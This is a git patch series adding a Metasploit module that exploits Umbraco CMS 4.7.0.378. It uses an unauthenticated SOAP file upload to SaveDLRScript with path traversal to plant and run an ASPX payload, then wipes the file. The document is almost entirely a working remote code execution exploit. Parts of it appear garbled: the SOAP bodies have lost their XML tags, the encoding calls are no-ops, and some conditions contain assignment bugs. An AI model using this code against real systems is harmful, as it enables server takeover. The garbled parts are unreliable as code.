From f8ca5b42340784d2806f47a83a4f63bba6747514 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Jul 2012 11:52:43 +0200 Subject: [PATCH 1/3] Revision of pull request #562 --- .../windows/http/umbraco_upload_aspx.rb | 206 ++++++++++++++++++ 1 file changed, 206 insertions(+) create mode 100644 modules/exploits/windows/http/umbraco_upload_aspx.rb diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb new file mode 100644 index 0000000000..06857f8f2f --- /dev/null +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -0,0 +1,206 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize + super( + 'Name' => 'Umbraco CMS Remote Command Execution', + 'Description' => %q{ + This module can be used to execute a payload on Umbraco CMS + 4.7.0.378. The payload is uploaded as an ASPX script by + sending a specially crafted SOAP request to codeEditorSave.asmx, + which permits unauthorised file upload via the SaveDLRScript operation. + SaveDLRScript is also subject to a path traversal vulnerability, + allowing code to be placed into the web-accessible /umbraco/ directory. + + The module writes, executes and then overwrites an ASPX script; note that + though the script content is removed, the file remains on the target. + }, + 'Author' => [ + 'Toby Clarke' # Vulnerability discovery and Metasploit module + ], + 'Version' => '$Revision: $', + 'Platform' => 'win', + 'References' => + [ + [ 'OSVDB', '63412' ], + [ 'BID', '39114' ], + [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ] + ], + 'Targets' => + [ + [ 'Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1', { } ], + ], + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Jun 28 2012' + ) + + register_options( + [ + OptString.new('PATH', [ true, "The URI path of the Umbraco login page", '/umbraco']) + ], self.class) + end + + # + # Remove the asmx if we get a meterpreter. + # + def on_new_session(cli) + if cli.type != 'meterpreter' + print_error("Meterpreter not used. Please manually remove #{@upload_random + '.aspx'}") + return + end + + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + + begin + aspx = @upload_random + '.aspx' + + print_status("#{@peer} - Searching: #{aspx}") + files = cli.fs.file.search("\\", aspx) + if not files or files.empty? + print_error("Unable to find #{aspx}. Please manually remove it.") + return + end + + files.each { |f| + print_status("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}") + cli.fs.file.rm(f['path'] + "\\" + f['name']) + } + print_status("#{@peer} - #{aspx} deleted") + rescue ::Exception => e + print_error("Unable to delete #{aspx}: #{e.message}") + end + end + + # Module based heavily upon Juan Vazquez's 'landesk_thinkmanagement_upload_asp.rb' + def exploit + + @peer = "#{rhost}:#{rport}" + + # Generate the ASPX containing the EXE containing the payload + exe = generate_payload_exe + aspx = Msf::Util::EXE.to_exe_aspx(exe) + + # htmlentities like encoding + aspx = aspx.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">") + + uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/") + @upload_random = rand_text_alpha(rand(6) + 6) + + soap = <<-eos + + + + + /..\\..\\..\\umbraco\\#{@upload_random}.aspx + string + #{aspx} + 1 + + + + eos + + # + # UPLOAD + # + + attack_url = uri_path + "webservices/codeEditorSave.asmx" + print_status("#{@peer} - Uploading #{aspx.length} bytes through #{attack_url}...") + print_status("#{@peer} - Uploading to #{uri_path}#{@upload_random}.aspx") + + res = send_request_cgi({ + 'uri' => attack_url, + 'method' => 'POST', + 'ctype' => 'text/xml; charset=utf-8', + 'headers' => { + 'SOAPAction' => "\"http://tempuri.org/SaveDLRScript\"", + }, + 'data' => soap, + }, 20) + + if (! res) + print_status("#{@peer} - Timeout: Trying to execute the payload anyway") + elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) + print_status("#{@peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + else + print_status("#{@peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") + end + + # + # EXECUTE + # + + upload_path = uri_path + "#{@upload_random}.aspx" + print_status("#{@peer} - Executing #{upload_path}...") + + res = send_request_cgi({ + 'uri' => upload_path, + 'method' => 'GET' + }, 20) + + if (! res) + print_error("#{@peer} - Execution failed on #{upload_path} [No Response]") + return + end + + if (res.code < 200 or res.code >= 300) + print_error("#{@peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + return + end + + # + # 'DELETE' - note that the file will remain on the system, but the content will be wiped. + # + + soap = <<-eos + + + + + /..\\..\\..\\umbraco\\#{@upload_random}.aspx + string + + 1 + + + + eos + + attack_url = uri_path + "webservices/codeEditorSave.asmx" + print_status("#{@peer} - Writing #{aspx.length} bytes through #{attack_url}...") + print_status("#{@peer} - Wrting over #{uri_path}#{@upload_random}.aspx") + + res = send_request_cgi({ + 'uri' => attack_url, + 'method' => 'POST', + 'ctype' => 'text/xml; charset=utf-8', + 'headers' => { + 'SOAPAction' => "\"http://tempuri.org/SaveDLRScript\"", + }, + 'data' => soap, + }, 20) + + if (! res) + print_error("#{@peer} - Deletion failed at #{attack_url} [No Response]") + return + elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) + print_status("#{@peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + else + print_status("#{@peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") + end + handler + end +end From 7751c54a526571e31284b0260f97b247d8de9d99 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Jul 2012 11:56:03 +0200 Subject: [PATCH 2/3] references updates --- modules/exploits/windows/http/umbraco_upload_aspx.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 06857f8f2f..cb0555dd18 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -34,8 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'OSVDB', '63412' ], - [ 'BID', '39114' ], [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ] ], 'Targets' => From 9fecc80459112d1ed2e67119cdd9e8d314250ebc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Jul 2012 15:47:25 +0200 Subject: [PATCH 3/3] User of TARGETURI plus improve of description --- .../windows/http/umbraco_upload_aspx.rb | 29 ++++++++++++------- 1 file changed, 18 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index cb0555dd18..7bda41c520 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -17,24 +17,29 @@ class Metasploit3 < Msf::Exploit::Remote super( 'Name' => 'Umbraco CMS Remote Command Execution', 'Description' => %q{ - This module can be used to execute a payload on Umbraco CMS - 4.7.0.378. The payload is uploaded as an ASPX script by - sending a specially crafted SOAP request to codeEditorSave.asmx, - which permits unauthorised file upload via the SaveDLRScript operation. - SaveDLRScript is also subject to a path traversal vulnerability, - allowing code to be placed into the web-accessible /umbraco/ directory. + This module can be used to execute a payload on Umbraco CMS 4.7.0.378. + The payload is uploaded as an ASPX script by sending a specially crafted + SOAP request to codeEditorSave.asmx, which permits unauthorised file upload + via the SaveDLRScript operation. SaveDLRScript is also subject to a path + traversal vulnerability, allowing code to be placed into the web-accessible + /umbraco/ directory. The module writes, executes and then overwrites an ASPX script; note that - though the script content is removed, the file remains on the target. + though the script content is removed, the file remains on the target. Automatic + cleanup of the file is intended if a meterpreter payload is used. + + This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows + 7 32-bit SP1. In this scenario, the "IIS APPPOOL\ASP.NET v4.0" user must have + write permissions on the Windows Temp folder. }, 'Author' => [ 'Toby Clarke' # Vulnerability discovery and Metasploit module ], - 'Version' => '$Revision: $', 'Platform' => 'win', 'References' => [ - [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ] + [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ], + [ 'URL', 'http://umbraco.codeplex.com/workitem/18192' ] # Item deleted for security reasons ], 'Targets' => [ @@ -47,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('PATH', [ true, "The URI path of the Umbraco login page", '/umbraco']) + OptString.new('TARGETURI', [true, 'The URI path of the Umbraco login page', '/umbraco/']) ], self.class) end @@ -94,7 +99,9 @@ class Metasploit3 < Msf::Exploit::Remote # htmlentities like encoding aspx = aspx.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">") - uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/") + uri_path = target_uri.path + uri_path.path << "/" if uri_path[-1, 1] != "/" + @upload_random = rand_text_alpha(rand(6) + 6) soap = <<-eos